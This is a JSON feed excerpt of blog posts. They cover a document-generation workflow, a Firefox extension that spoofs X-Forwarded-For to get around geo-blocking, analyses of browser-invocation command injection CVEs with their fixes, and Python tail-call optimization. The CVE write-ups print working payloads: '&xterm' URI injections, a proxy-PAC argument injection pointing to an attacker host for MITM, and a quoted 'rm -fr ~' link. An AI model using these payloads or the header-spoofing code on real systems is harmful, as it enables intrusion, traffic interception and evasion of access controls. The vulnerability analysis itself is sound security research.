\n"}, {"id": "http://www.gabriel.urdhr.fr/2018/11/26/document-generation-workflow/", "title": "My document generation workflow with Markdown, YAML, Jinja2 and WeasyPrint", "url": "https://www.gabriel.urdhr.fr/2018/11/26/document-generation-workflow/", "date_published": "2018-11-26T00:00:00+01:00", "date_modified": "2018-11-26T00:00:00+01:00", "tags": ["computer", "python"], "content_html": "

I'm not a super fan a WISWYG text editors. They never really do what I want\nthem to and often often do what I don't whan them to.\nHere's the workflow I'm using to generate simple text documents\n(resume, cover letters, etc.) from Markdown, YAML and Jinja2 templates.

\n

Summary:

\n
    \n
  1. input document is in Markdown with YAML frontmatter
  2. \n
  3. HTML conversion using a Jinja2 template
  4. \n
  5. PDF conversion from HTML with WeasyPrint
  6. \n
\n

Good-old make coordinates the different steps.

\n

The nice things about this approach is that:

\n\n

Input file

\n

The input of the document is a Markdown file with frontmatter and looks like that:

\n
name: John Doe\ntitle: Super hero\naddress:\n  - 221B Baker Street\n  - London\n  - UK\nlang: en\nphone: +XX-X-XX-XX-XX-XX\nemail: john.doe@example.com\nwebsite: http://www.example.com/john.doe/\n---\n
\n\n\n
## Introduction\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor\nincididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,\nquis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo\nconsequat. Duis aute irure dolor in reprehenderit in voluptate velit esse\ncillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat\nnon proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\n\n## Discussion\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod\ntempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,\nquis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo\nconsequat. Duis aute irure dolor in reprehenderit in voluptate velit esse\ncillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat\nnon proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\n\n\n## Conclusion\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod\ntempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,\nquis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo\nconsequat. Duis aute irure dolor in reprehenderit in voluptate velit esse\ncillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat\nnon proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n
\n\n\n

HTML conversion

\n

I'm using a Jinja2 template to convert the input Markdown document into HTML:

\n
<html xmlns=\"http://www.w3.org/1999/xhtml\" lang=\"{{ lang | escape}}\">\n<head>\n  <meta charset=\"utf-8\"/>\n  <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n  <title>{{ title | escape }}</title>\n  <link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\"/>\n</head>\n<body>\n\n<header>\n  <address>\n    <strong>{{ name | escape }}</strong><br/>\n    {% for line in address %}\n    {{ line | escape }}<br/>\n    {% endfor %}\n  </address>\n  <span class=\"details\">\n    <p><span title=\"{{ 'T\u00e9l\u00e9phone' if lang == 'fr' else 'Phone' }}\">\u260e</span>\n      <a href=\"tel:{{ phone | escape}}\">{{ phone | escape }}</a></p>\n    <p><a href=\"mailto:{{ email | escape }}\">{{ email | escape }}</a></p>\n    <p><a href=\"{{ website | escape }}\">{{ website | escape }}</a></p>\n  </span>\n</header>\n\n<h1>{{ title | escape }}</h1>\n{{ body }}\n\n</body>\n</html>\n
\n\n\n

The conversion is done with a Python script (./render):

\n
#!/usr/bin/env python3\n\nfrom sys import argv\nimport re\n\nimport yaml\nimport markdown\nfrom markdown.extensions.extra import ExtraExtension\nfrom jinja2 import Environment, FileSystemLoader\nfrom atomicwrites import atomic_write\n\nEXT = [\n    ExtraExtension()\n]\n\nenv = Environment(\n    loader=FileSystemLoader('.'),\n    autoescape=False,\n)\ntemplate = env.get_template('template.j2')\n\nfilename = argv[1]\nout_filename = argv[2]\n\nRE = re.compile(r'^---\\s*$', re.M)\n\n\ndef split_document(data):\n    \"\"\"\n    Split a document into a YAML frontmatter and a body\n    \"\"\"\n    lines = str.splitlines(data)\n    if not RE.match(lines[0]):\n        raise Exception(\"Missing YAML start\")\n    for i in range(1, len(lines)):\n        if RE.match(lines[i]):\n            head_raw = \"\\n\".join(lines[:i+1])\n            head = list(yaml.load_all(head_raw))[0]\n            body = \"\\n\".join(lines[i+2:])\n            return (head, body)\n    raise Exception(\"Missing YAML end\")\n\n\nwith open(filename, \"r\") as f:\n    content = f.read()\n(head, body) = split_document(content)\nbody_html = markdown.markdown(body, extensions=EXT)\nwith atomic_write(out_filename, overwrite=True) as f:\n    f.write(template.render(**head, body=body_html))\n
\n\n\n

Called as:

\n
./render doc.md doc.html\n
\n\n\n

PDF conversion

\n

I'm using WeasyPrint to generate PDF from HTML:

\n
weasyprint doc.html doc.pdf\n
\n\n\n

WeasyPrint has some support for page CSS:

\n
@page {\n  size: A4;\n  margin: 1cm;\n  margin-top: 2cm;\n  margin-bottom: 2cm;\n}\n\n@media print {\n  body {\n    margin-top: 0;\n    margin-bottom: 0;\n  }\n}\n\nh1, h2, h3 {\n  page-break-after: avoid;\n  page-break-inside: avoid;\n}\n\nli {\n  page-break-inside: avoid;\n}\n
\n\n\n

It has support for links, PDF bookmarks, attachements, fonts, etc.

\n

Make

\n

Currently I'm using a Makefile to compose the different steps:

\n
.PHONY: all clear\n\nall: doc.html\nclear:\n    rm doc.html\n\ndoc.html: doc.md template.j2 render\n    ./render doc.md doc.html\n\ndoc.pdf: doc.html\n    weasyprint doc.html doc.pdf\n
"}, {"id": "http://www.gabriel.urdhr.fr/2018/11/22/south-park-ip-address-spoofing/", "title": "IP address spoofing in order to watch South Park", "url": "https://www.gabriel.urdhr.fr/2018/11/22/south-park-ip-address-spoofing/", "date_published": "2018-11-22T00:00:00+01:00", "date_modified": "2018-11-22T00:00:00+01:00", "tags": ["computer", "web", "hack", "firefox"], "content_html": "

Trying to bring back some old IP spoofing Firefox extension\nfor watching South Park episodes.

\n

Years ago, I was trying to watch the South Park episodes on the\nofficial website. While all the episodes were\nseemingly available for free on the website, they were sadly not available\nfrom a French IP address.\nSo I wrote a Firefox extension which would \u201cspoof\u201d a random US IP address.\nThe extension was sending a X-Forwarded-For HTTP header with an US IP address\non all requests for www.southparkstudios.com, media.mtvnservices.com.\nAt that time these servers were happily trusting the IP address in the HTTP\nheader and would grant you access to the episodes \"\ud83d\ude01\".

\n
// Fake US IP address\n// taken from https://developer.mozilla.org/en/Setting_HTTP_request_headers\n\nfunction rand(min, max) {\n  var range = max - min;\n  return Math.floor((range+1)*Math.random()) + min;\n}\n\nvar ipSpoofer = {\n  ip: \"199.\"+rand(236,240)+\".\"+rand(0,255)+\".\"+rand(1,254),\n  started: false,\n  checkSpoofability : function(httpChannel) {\n    return true;\n    var host = httpChannel.originalURI.host;\n    return host == \"www.southparkstudios.com\" || host == \"media.mtvnservices.com\";\n  },\n  observe: function(subject, topic, data) {\n    if (topic == \"http-on-modify-request\") {\n      var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);\n      if (this.checkSpoofability(httpChannel)) {\n        httpChannel.setRequestHeader(\"X-Forwarded-For\", this.ip, false);\n      }\n    }\n  },\n  chooseIp : function() {\n      this.ip = \"199.\"+rand(236,240)+\".\"+rand(0,255)+\".\"+rand(1,254);\n  },\n  start: function() {\n    if (!this.started){\n      if (!this.ip) {\n          this.chooseIp();\n      }\n      Components.classes[\"@mozilla.org/observer-service;1\"].\n        getService(Components.interfaces.nsIObserverService).\n        addObserver(this, \"http-on-modify-request\", false);\n      this.started = true;\n    }\n  },\n  stop: function() {\n    if (this.started)  {\n      Components.classes[\"@mozilla.org/observer-service;1\"].\n        getService(Components.interfaces.nsIObserverService).\n        removeObserver(this, \"http-on-modify-request\");\n      this.started = false;\n    }\n  }\n};\n\nfunction startup(data,reason) {\n  ipSpoofer.start();\n}\n\nfunction shutdown(data,reason) {\n  ipSpooder.stop();\n}\n
\n\n\n

The old-Firefox extensions do not work anymore on newest versions of Firefox,\nwith the new extensions system. I rewrote it in order to check if that old\ntrick was still working these days. And the sad (but expected) truth is that the\nservers are not blindly trusting those HTTP headers these days \"\ud83d\ude2d\".

\n
function rand(min, max) {\n  const range = max - min;\n  return Math.floor((range+1)*Math.random()) + min;\n}\n\nconst ip = \"199.\" + rand(236,240) + \".\" + rand(0,255) + \".\"+rand(1,254);\n\nfunction rewriteHeaders(req) {\n  const url = new URL(req.url)\n  const headers = Array.from(req.requestHeaders)\n  headers.push({\n    \"name\": \"X-Forwarded-For\",\n    \"value\": ip\n  });\n  headers.push({\n    \"name\": \"Forwarded\",\n    \"value\": \"by=127.0.0.1; for=\" + ip + \"; host=\" + url.host+ \"; proto=\" + (url.protocol.replace(\":\", \"\")),\n  });\n  return {requestHeaders: headers};\n}\n\nbrowser.webRequest.onBeforeSendHeaders.addListener(\n  rewriteHeaders,\n  {urls: [\"<all_urls>\"]},\n  [\"blocking\", \"requestHeaders\"]\n);\n
"}, {"id": "http://www.gabriel.urdhr.fr/2018/05/30/more-browser-injections/", "title": "More example of argument and shell command injections in browser invocation", "url": "https://www.gabriel.urdhr.fr/2018/05/30/more-browser-injections/", "date_published": "2018-05-30T00:00:00+02:00", "date_modified": "2018-05-30T00:00:00+02:00", "tags": ["computer", "unix", "debian", "security", "shell"], "content_html": "

In the previous episode, I talked about\nsome argument and shell command injections vulnerabilities\nthrough URIs passed to browsers.\nHere I'm checkig some other CVEs which were registered at the same time.

\n

ScummVM (CVE-2017-17528)

\n

In ScummVM, we have:

\n
bool OSystem_POSIX::openUrl(const Common::String &url) {\n    // inspired by Qt's \"qdesktopservices_x11.cpp\"\n\n    // try \"standards\"\n    if (launchBrowser(\"xdg-open\", url))\n        return true;\n    if (launchBrowser(getenv(\"DEFAULT_BROWSER\"), url))\n        return true;\n    if (launchBrowser(getenv(\"BROWSER\"), url))\n        return true;\n\n    // try desktop environment specific tools\n    if (launchBrowser(\"gnome-open\", url)) // gnome\n        return true;\n    if (launchBrowser(\"kfmclient openURL\", url)) // kde\n        return true;\n    if (launchBrowser(\"exo-open\", url)) // xfce\n        return true;\n\n    // try browser names\n    if (launchBrowser(\"firefox\", url))\n        return true;\n    if (launchBrowser(\"mozilla\", url))\n        return true;\n    if (launchBrowser(\"netscape\", url))\n        return true;\n    if (launchBrowser(\"opera\", url))\n        return true;\n    if (launchBrowser(\"chromium-browser\", url))\n        return true;\n    if (launchBrowser(\"google-chrome\", url))\n        return true;\n\n    warning(\"openUrl() (POSIX) failed to open URL\");\n    return false;\n}\n\nbool OSystem_POSIX::launchBrowser(const Common::String& client, const Common::String &url) {\n    // FIXME: system's input must be heavily escaped\n    // well, when url's specified by user\n    // it's OK now (urls are hardcoded somewhere in GUI)\n    Common::String cmd = client + \" \" + url;\n    return (system(cmd.c_str()) != -1);\n}\n
\n\n\n

OSystem_POSIX::openUrl() calls system() without quoting the URI.\nThis is clearly vulnerable to shell command injection but,\nas stated in the comment, it's currently not a problem in pratice\nbecause the only calls are of openUrl() are:

\n
g_system->openUrl(\"http://www.amazon.de/EuroVideo-Bildprogramm-GmbH-Full-Pipe/dp/B003TO51YE/ref=sr_1_1?ie=UTF8&s=videogames&qid=1279207213&sr=8-1\");\ng_system->openUrl(\"http://pipestudio.ru/fullpipe/\");\ng_system->openUrl(\"http://scummvm.org/\")\ng_system->openUrl(getUrl())\n
\n\n\n

with:

\n
Common::String StorageWizardDialog::getUrl() const {\n    Common::String url = \"https://www.scummvm.org/c/\";\n    switch (_storageId) {\n    case Cloud::kStorageDropboxId:\n        url += \"db\";\n        break;\n    case Cloud::kStorageOneDriveId:\n        url += \"od\";\n        break;\n    case Cloud::kStorageGoogleDriveId:\n        url += \"gd\";\n        break;\n    case Cloud::kStorageBoxId:\n        url += \"bx\";\n        break;\n    }\n\n    if (Cloud::CloudManager::couldUseLocalServer())\n        url += \"s\";\n\n    return url;\n}\n
\n\n\n

The only case where shell commands are actually injected is the first one where\nit does something like:

\n
xdg-open https://www.amazon.de/EuroVideo-Bildprogramm-GmbH-Full-Pipe/dp/B003TO51YE/ref=sr_1_1?ie=UTF8&s=videogames&qid=1279207213&sr=8-1\n
\n\n\n

which make these assignments in subshells (which is quite harmless):

\n
ie=UTF8\ns=videogames\nqid=1279207213\nsr=8-1\n
\n\n\n

References:

\n\n

GNU GLOBAL (CVE-2017-17531)

\n

In GNU GLOBAL, it looked like this:

\n
snprintf(com, sizeof(com), \"%s \\\"%s\\\"\", browser, url);\nsystem(com);\n
\n\n\n

Here, the URI is double-quoted but this is not enough:

\n\n

For v6.6.1,\neach argument is quoted with quote_shell() in order to properly escape\nthe shell metacharacters:

\n
strbuf_puts(sb, quote_shell(browser));\nstrbuf_putc(sb, ' ');\nstrbuf_puts(sb, quote_shell(url));\nsystem(strbuf_value(sb));\n
\n\n\n

In v6.6.2\nthis was changed to using execvp():

\n
argv[0] = (char *)browser;\nargv[1] = (char *)url;\nargv[2] = NULL;\nexecvp(browser, argv);\n
\n\n\n

Using execvp() is much better than relying on system() and using\nan error-prone escaping of the URI to prevent injections.

\n

References:

\n\n

gjots2 (CVE-2017-17535)

\n

In gjots2, the vulnerable code is:

\n
def _run_browser_on(self, url):\n  if self.debug:\n    print inspect.getframeinfo(inspect.currentframe())[2]\n  browser = self._get_browser()\n  if browser:\n    os.system(browser + \" '\" + url + \"' &\")\n  else:\n    self.msg(\"Can't run a browser\")\n  return 0\n
\n\n\n

The URI is single-quoted.

\n

We can use single-quotes in the URI to injection commands.\nFor example, opening link in gjots2 spawns a xterm:

\n
\nhttp://www.example.com/'&xterm'\n
\n\n

References:

\n\n

ABiWord (CVE-2017-17529)

\n

In AbiWord, we have:

\n
GError *err = NULL;\n#if GTK_CHECK_VERSION(2,14,0)\nif(!gtk_show_uri (NULL, url, GDK_CURRENT_TIME, &err)) {\n  fallback_open_uri(url, &err);\n}\nreturn err;\n#elif defined(WITH_GNOMEVFS)\ngnome_vfs_url_show (url);\nreturn err;\n#else\nfallback_open_uri(url, &err);\nreturn err;\n#endif\n
\n\n\n

The problematic code is supposed to be in fallback_open_uri():

\n
gint    argc;\ngchar **argv = NULL;\nchar   *cmd_line = g_strconcat (browser, \" %1\", NULL);\n\nif (g_shell_parse_argv (cmd_line, &argc, &argv, err)) {\n  /* check for '%1' in an argument and substitute the url\n   * otherwise append it */\n  gint i;\n  char *tmp;\n\n  for (i = 1 ; i < argc ; i++)\n    if (NULL != (tmp = strstr (argv[i], \"%1\"))) {\n      *tmp = '\\0';\n      tmp = g_strconcat (argv[i],\n        (clean_url != NULL) ? (char const *)clean_url : url,\n        tmp+2, NULL);\n      g_free (argv[i]);\n      argv[i] = tmp;\n      break;\n    }\n\n  /* there was actually a %1, drop the one we added */\n  if (i != argc-1) {\n    g_free (argv[argc-1]);\n    argv[argc-1] = NULL;\n  }\n  g_spawn_async (NULL, argv, NULL, G_SPAWN_SEARCH_PATH,\n    NULL, NULL, NULL, err);\n  g_strfreev (argv);\n}\ng_free (cmd_line);\n
\n\n\n

This code seems correct with respect to injection through the URI:\nthe URI string cannot be expanded into multiple arguments\n(no word splitting) and is not passed to system().

\n

I think this code is safe.\nI could not trigger any injection through AbiWord.\nI tested gtk_show_uri(), fallback_open_uri() and gnome_vfs_url_show()\nin isolation and I could not trigger any injection through the URI.

\n

References:

\n\n

FontForge (CVE-2017-17521)

\n

In FontForge, the help() function is clearly vulnerable. The URI is\ndouble-quoted:

\n
temp = malloc(strlen(browser) + strlen(fullspec) + 20);\nsprintf( temp, strcmp(browser,\"kfmclient openURL\")==0 ? \"%s \\\"%s\\\" &\" : \"\\\"%s\\\" \\\"%s\\\" &\", browser, fullspec );\nsystem(temp);\n
\n\n\n

In practice, it is always used with path where this is safe to do.

\n

References:

\n\n

Ocaml Batteries Included (CVE-2017-17519)

\n

The code is:

\n
let (browser: (_, _, _) format) = \"@BROWSER_COMMAND@ %s\";;\n\n(**The default function to open a www browser.*)\nlet default_browse s =\n  let command = Printf.sprintf browser s in\n  Sys.command command\nlet current_browse = ref default_browse\n\nlet browse s = !current_browse s\n
\n\n\n

system() is called without any quotation of the URI.

\n

Example:

\n
open Batteries;;\nopen BatteriesConfig;;\nbrowse \"http://www.example.com/&xterm\";;\n
\n\n\n

Compiled with:

\n
ocamlfind ocamlc -package batteries -linkpkg browser2.ml -o browser2\n
\n\n\n

References:

\n\n

Python 3 (CVE-2017-17522)

\n

The code is:

\n
class GenericBrowser(BaseBrowser):\n    \"\"\"Class for all browsers started with a command\n       and without remote functionality.\"\"\"\n\n    def __init__(self, name):\n        if isinstance(name, str):\n            self.name = name\n            self.args = [\"%s\"]\n        else:\n            # name should be a list with arguments\n            self.name = name[0]\n            self.args = name[1:]\n        self.basename = os.path.basename(self.name)\n\n    def open(self, url, new=0, autoraise=True):\n        cmdline = [self.name] + [arg.replace(\"%s\", url)\n                                 for arg in self.args]\n        try:\n            if sys.platform[:3] == 'win':\n                p = subprocess.Popen(cmdline)\n            else:\n                p = subprocess.Popen(cmdline, close_fds=True)\n            return not p.wait()\n        except OSError:\n            return False\n
\n\n\n

A note in the CVE says:

\n
\n

NOTE: a software maintainer indicates that exploitation is impossible\nbecause the code relies on subprocess.Popen and the default shell=False\nsetting.

\n
\n

Popen is indeed passed an array of arguments which are passed to execve().\nThere is not argument splitting and no shell is involved\nso this code is not vulnerable to URI-based injections.

\n

References:

\n\n

TeX (CVE-2017-17513)

\n

I have no idea what mtxrun is supposed to do but it looks\nlike it's vulnerable because the URI is not quoted:

\n
local launchers={\n  windows=\"start %s\",\n  macosx=\"open %s\",\n  unix=\"$BROWSER %s &> /dev/null &\",\n}\nfunction os.launch(str)\n  execute(format(launchers[os.name] or launchers.unix,str))\nend\n
\n\n\n

References:

\n\n

Summary

\n"}, {"id": "http://www.gabriel.urdhr.fr/2018/05/28/browser-injections/", "title": "Argument and shell command injections in browser invocation", "url": "https://www.gabriel.urdhr.fr/2018/05/28/browser-injections/", "date_published": "2018-05-28T00:00:00+02:00", "date_modified": "2018-05-28T00:00:00+02:00", "tags": ["computer", "unix", "debian", "security", "shell"], "content_html": "

While reading the source of sensible-browser in order to understand how\nit was choosing which browser to call (and how I could tweak this choice),\nI found an argument injection vulnerability\nwhen handling the BROWSER environment variable.\nThis lead me (and others) to a a few other argument and shell command injection\nvulnerabilities in BROWSER processing and browser invocation in general.

\n

Overview:

\n\n

The BROWSER variable environment

\n

The BROWSER environment variable is used as a way to specify the user's\npreferred browser. The specific handling of this variable is not consistent\nacross programs:

\n\n

As was already noted in 2001,\nnaively implementing support for this environment variable\n(and especially the %s expansion) can lead to injection vulnerabilities:

\n
\n

Eric Raymond has proposed the BROWSER convention for Unix-like systems,\nwhich lets users specify their browser preferences and lets developers easily\ninvoke those browsers. In general, this is a great idea.\nUnfortunately, as specified it has horrendous security flaws;\ndocuments containing hypertext links like ; /bin/rm -fr ~\nwill erase all of a user's files when the user selects it!

\n
\n

In contrast, the .desktop file specification\nclearly specifies\nhow argument expansion and word splitting is supposed to happen\nwhen processing .desktop files\nin a way which is not vulnerable to injection attacks.

\n

Argument injection in sensible-browser (CVE-2017-17512)

\n

The vulnerability

\n

sensible-browser is a simple program which tries to guess a suitable browser\nto open a given URI. You call it like:

\n
sensible-browser http://www.example.com/\n
\n\n\n

and it ultimately calls something like:

\n
firefox http://www.example.com/\n
\n\n\n

The actual browser called depends on the desktop environment (and its\nconfiguration) and some environment variable.

\n

While trying to understand how I could configure the browser to use,\nI found this snippet:

\n
if test -n \"$BROWSER\"; then\n  OLDIFS=\"$IFS\"\n  IFS=:\n  for i in $BROWSER; do\n      case \"$i\" in\n          (*%s*)\n          :\n          ;;\n          (*)\n          i=\"$i %s\"\n          ;;\n      esac\n      IFS=\"$OLDIFS\"\n      cmd=$(printf \"$i\\n\" \"$URL\")\n      $cmd && exit 0\n  done\nfi\n
\n\n\n

The idea is that when the BROWSER environment variable is set, it is taken\nas a list of browsers which are tried in turn. Morever if %s in present in\none of the browser strings, it is replaced with the URI.

\n

The problem is that if $URL contains some spaces (or other IFS characters)\nthe URL will be split in several arguments.

\n

The interesting lines are:

\n
cmd=$(printf \"$i\\n\" \"$URL\")\n$cmd && exit 0\n
\n\n\n

An attacker could inject additional arguments in the browser call.

\n

For example, this command opens a Chromium window in incognito mode:

\n
BROWSER=chromium sensible-browser \"http://www.example.com/ --incognito\"\n
\n\n\n

One could argue that this URI is invalid and that this is not a problem.\nHowever, if the caller of sensible-browser does not properly validate the URI,\nan attacker could craft a broken URI which when called\nwill add extra arguments when calling the browser.

\n

A suitable caller

\n

Emacs might call sensible-browser with an invalid URI.

\n

First, we configure it to use open links with sensible-browser:

\n
(setq browse-url-browser-function (quote browse-url-generic))\n(setq browse-url-generic-program \"sensible-browser\")\n
\n\n\n

Now, an org-mode file like this one will open Chromium in incognito mode:

\n
[[http://www.example.com/ --incognito][test]]\n
\n\n\n

Note: I was able to trigger this with org-mode 9.1.2 as shipped in the\nin Debian elpa-org package. This does not happen with org-mode 8.2.10\nwhich was shipped in the emacs25 package.

\n

MITMing the browser

\n

This particular example is not very dangerous and the injection is easy\nto notice. However, other injected arguments can be more harmful and more\ninsiduous.

\n

Clicking on the link of this org file launches Chromium with an\nalternative PAC file:

\n
[[http://www.example.com/ --proxy-pac-file=http://dangerous.example.com/proxy.pac][test]]\n
\n\n\n

Nothing is notifying the user that an alternative PAC file is in use.

\n

An attacker could use this type of URI to forward all the browser traffic\nto a server under his control and effectively MITM all the browser traffic:

\n
function FindProxyForURL(url, host)\n{\n  return \"SOCKS mitm.example.com:9080\";\n}\n
\n\n\n

Of course, for HTTPS websites, the attacker still cannot MITM the user unless\nthe users accepts a bogus certificate.

\n

Alternatively, you can simply\npass a --proxy-server argument\nto set a proxy withtout using a PAC file.

\n

Fixing the vulnerability

\n

A possible fix would be for sensible-browser to actually check that the\nURL parameter does not contain any IFS character.

\n

The fix currently deployed is to remove support for %s-expansion altogether\n(as well as support for multiple browsers):

\n
if test -n \"$BROWSER\"; then\n    ${BROWSER} \"$@\"\n    ret=\"$?\"\n    if [ \"$ret\" -ne 126 ] && [ \"$ret\" -ne 127 ]; then\n        exit \"$ret\"\n    fi\nfi\n
\n\n\n

References

\n\n

Argument injection in xdg-open (CVE-2017-18266)

\n

xdg-open is similar to sensible-browser. It opens files or URIs with some\nprograms depending on the desktop-environment.\nIn some cases it fall backs to using BROWSER:

\n
open_envvar()\n{\n    local oldifs=\"$IFS\"\n    local browser browser_with_arg\n\n    IFS=\":\"\n    for browser in $BROWSER; do\n        IFS=\"$oldifs\"\n\n        if [ -z \"$browser\" ]; then\n            continue\n        fi\n\n        if echo \"$browser\" | grep -q %s; then\n            $(printf \"$browser\" \"$1\")\n        else\n            $browser \"$1\"\n        fi\n\n        if [ $? -eq 0 ]; then\n            exit_success\n        fi\n    done\n}\n
\n\n\n

The interesting bit is:

\n
$(printf \"$browser\" \"$1\")\n
\n\n\n

This is vulnerable to argument injection like the sensible-browser case.

\n

This bug was reported in the xdg-utils bugtracker as bug\n#103807\nand I proposed this very simple fix:

\n
if echo \"$browser\" | grep -q %s; then\n  # Avoid argument injection.\n  # See https://bugs.freedesktop.org/show_bug.cgi?id=103807\n  # URIs don't have IFS characters spaces anyway.\n  has_single_argument $1 && $(printf \"$browser\" \"$1\")\nelse\n  $browser \"$1\"\nfi\n
\n\n\n

where has_single_argument() is defined has:

\n
has_single_argument()\n{\n  test $# = 1\n}\n
\n\n\n

Another (better) solution\ncurrently shipped in Debian is:

\n
url=\"$1\"\nif echo \"$browser\" | grep -q %s; then\n  shift $#\n  for arg in $browser; do\n    set -- \"$@\" \"$(printf -- \"$arg\" \"$url\")\"\n  done\n  \"$@\"\nelse\n  $browser \"$url\"\nfi\n
\n\n\n

By the way, I learned this usage of set.

\n

References:

\n\n

Shell command injection in lilypond (CVE-2017-17523, CVE-2018-10992)

\n

I started checking if the same vulnerability could be found in other programs\nusing Debian code search.\nThis led me to lilypond-invoke-editor.

\n

This is an helper script expected to be set as a URI handler in a PDF viewer.\nIt handles some special lilypond URIs\n(textedit://FILE:LINE:CHAR:COLUMN).\nIt forwards other URIs to some real browser using:

\n
(define (run-browser uri)\n  (system\n   (if (getenv \"BROWSER\")\n       (format #f \"~a ~a\" (getenv \"BROWSER\") uri)\n       (format #f \"firefox -remote 'OpenURL(~a,new-tab)'\" uri))))\n
\n\n\n

The scheme system function is equivalent to the C system():\nit passes the argument to the shell (with sh -c).

\n

This case is worse than the previous ones.\nNot only can an attacker inject extra arguments\n(provided the caller can pass IFS chracters)\nbut it's possible to inject arbitrary shell commands:

\n
BROWSER=\"chromium\" lilypond-invoke-editor \"http://www.example.com/ & xterm\"\n
\n\n\n

It even works with valid URIs:

\n
BROWSER=\"chromium\" lilypond-invoke-editor \"http://www.example.com/&xterm\"\n
\n\n\n

We can generate a simple PDF file which contains a link\nwhich calls xterm through lilypond-invoke-editor:

\n
BROWSER=\"lilypond-invoke-editor\" mupdf xterm-inject.pdf\n
\n\n\n

The current fix in Debian is:

\n
(define (run-browser uri)\n  (if (getenv \"BROWSER\")\n        (system*\n          (getenv \"BROWSER\")\n          uri)\n          (system*\n            \"firefox\"\n            \"-remote\"\n            (format #f \"OpenUrl(~a,new-tab)\" uri))))\n
\n\n\n

system* is similar to posix_spawnp(): it takes a list of arguments\nand does something like fork(), execvp() and wait()\n(without going through a shell interpreter).

\n

References\u00a0:

\n\n

Similar vulnerabilities

\n

Someone apparently took over the job of finding similar issues in other packages\nbecause a whole range of related CVE has been registered at the same time\n(some of them are disputed, not all of them are valid):

\n\n

I'll look at some of them in a next episode.

\n

Analysis

\n

These vulnerabilities can be split in two classes.

\n

Argument injection

\n

Argument injection can happen when IFS present in the URI are expanded\ninto multiple arguments.\nThis usually happen because of unquoted shell expansion\nof non-validated strings:

\n
my-command $some_untrusted_input\n
\n\n\n

IFS characters are not in valid URIs so if the URI\nwas already validated somehow in the caller this is not be an issue.\nAs we have seen, some caller might not properly validate the URI string.

\n

Shell command injection

\n

Shell command injection can happen when shell metacharacters\n($, <, >, ;, &, &&, |, ||, etc.) found in the URI\nare passed without proper escaping to the shell interpreter:

\n\n

A typical example would be be (in Python):

\n
os.system(\"my-command \" + url)\n
\n\n\n

Or in shell:

\n
eval my-command \"$url\"\n
\n\n\n

In some cases, some escaping is done such as\nin gjots2:

\n
os.system(browser + \" '\" + url + \"' &\")\n
\n\n\n

This simple quoting is not enough however because you can escape out of it\nusing single-quotes in the untrusted input. If you want to to that, you need\nto properly escape\nquotes and backslashes in the input as well:

\n
os.system(\"{} {} \".format(browser, shlex.quote(url)))\n
\n\n\n

Using system() is often a bad idea and you'd better use:

\n\n

For example, the previous example could be rewritten as:

\n
os.spawnvp(os.P_WAIT, browser, [browser, url])\n
\n\n\n

Some of the shell metacharacters (&, ;, etc.) can be present in valid URIs\n(eg. http://www.example.com/&xterm)\nso even a proper URI validation does not protect against those attacks.

\n

Related

\n"}, {"id": "http://www.gabriel.urdhr.fr/2018/03/19/sibling-tco-in-python/", "title": "Sibling Tail Call Optimization in Python", "url": "https://www.gabriel.urdhr.fr/2018/03/19/sibling-tco-in-python/", "date_published": "2018-03-19T00:00:00+01:00", "date_modified": "2018-03-19T00:00:00+01:00", "tags": ["computer", "python", "functional"], "content_html": "

In Tail Recursion In Python,\nChris Penner\nimplements (self) tail-call optimization (TCO) in Python using a function decorator.\nHere I'm extending the approach for sibling calls.

\n

Problem

\n

The example function is a functional-style factorial function defined with\ntail recursion as:

\n
def factorial(n, accumulator=1):\n    if n == 0:\n      return accumulator\n    else:\n      return factorial(n-1, accumulator * n)\n
\n\n\n

The python interpreter does not implement taill call optimization so calling\nfactorial(1000) overflows the stack:

\n
\nTraceback (most recent call last):\n  File \"plain.py\", line 10, in \n    print(factorial(2000))\n  File \"plain.py\", line 8, in factorial\n    return factorial(n-1, accumulator * n)\n  File \"plain.py\", line 8, in factorial\n    return factorial(n-1, accumulator * n)\n  File \"plain.py\", line 8, in factorial\n    return factorial(n-1, accumulator * n)\n  File \"plain.py\", line 8, in factorial\n    return factorial(n-1, accumulator * n)\n  File \"plain.py\", line 8, in factorial\n    return factorial(n-1, accumulator * n)\n  [..]\n  File \"plain.py\", line 8, in factorial\n    return factorial(n-1, accumulator * n)\nRuntimeError: maximum recursion depth exceeded\n
\n\n

Original Solution

\n

Chris Penner implements taill call optimization using a function decorator\n(tail_recursive):

\n
# Normal recursion depth maxes out at 980, this one works indefinitely\n@tail_recursive\ndef factorial(n, accumulator=1):\n    if n == 0:\n        return accumulator\n    recurse(n-1, accumulator=accumulator*n)\n
\n\n\n

With the recurse function triggering the self taill-call\n(factorial calls itself).

\n

The implementation is:

\n
class Recurse(Exception):\n    def __init__(self, *args, **kwargs):\n        self.args = args\n        self.kwargs = kwargs\n\ndef recurse(*args, **kwargs):\n    raise Recurse(*args, **kwargs)\n\ndef tail_recursive(f):\n    def decorated(*args, **kwargs):\n        while True:\n            try:\n                return f(*args, **kwargs)\n            except Recurse as r:\n                args = r.args\n                kwargs = r.kwargs\n                continue\n    return decorated\n
\n\n\n

This is implemented by wrapping the original factorial functions.\nThe recurse functions throws an exception which is caught be the wrapper\nfunction: the wrapper calls the factorial function again with the new\narguments.

\n

Limitations

\n

One limitation of this approach is that it only allows self tail-calls\n(the function calls itself) but not sibling tail-calls (eg. functions a calls\nfunction b and function b calls function a).

\n

Sibling-call friendly version (without exceptions)

\n

Instead we could use someting like this:

\n
